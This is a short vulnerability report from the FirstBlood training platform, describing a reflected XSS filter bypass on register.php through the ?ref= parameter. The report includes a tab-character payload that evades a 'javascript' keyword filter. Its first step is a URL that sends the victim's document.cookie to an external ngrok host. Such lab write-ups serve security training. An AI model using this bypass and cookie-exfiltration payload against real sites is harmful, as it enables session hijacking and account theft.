FirstBlood-#680Reflected xss bypass on register.php with ref paramter
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-27, newrouge Level 3 reported:

Hey, I found a reflective xss on /register.php page with ?ref= paramter.

Register page takes a paramter ?ref= and reflcets it in response, previously this was vulnerable to xss by javascript:alert(1) but developer made some fixes and started filtering out keywords like javascript from input.

It was some bypass time.

Steps:

  1. Send this url to victim, https://2c19d123df3d-newrouge.a.firstbloodhackers.com/register.php?ref=ja%09vasc%09ript:window.location.href=`http://ca7f-45-118-159-250.ngrok.io/${document.cookie}`
  2. Victim click return to previous page.
  3. Cookies leaked to attacker's server

  • it happens as cookies are not set httponly and weak xss filtering on ref input.

Thanks

newrouge

P3 Medium

Endpoint: /register.php

Parameter: ?ref=

Payload: ja%09vasc%09ript:alert(document.domain)


FirstBlood ID: 32
Vulnerability Type: Reflective XSS

The parameter ?ref on register.php was poorly fixed and can be bypassed in various ways. Firstly the developer failed to use strtolower() when comparing strings, and the use of characters such as %09 will also bypass the filter.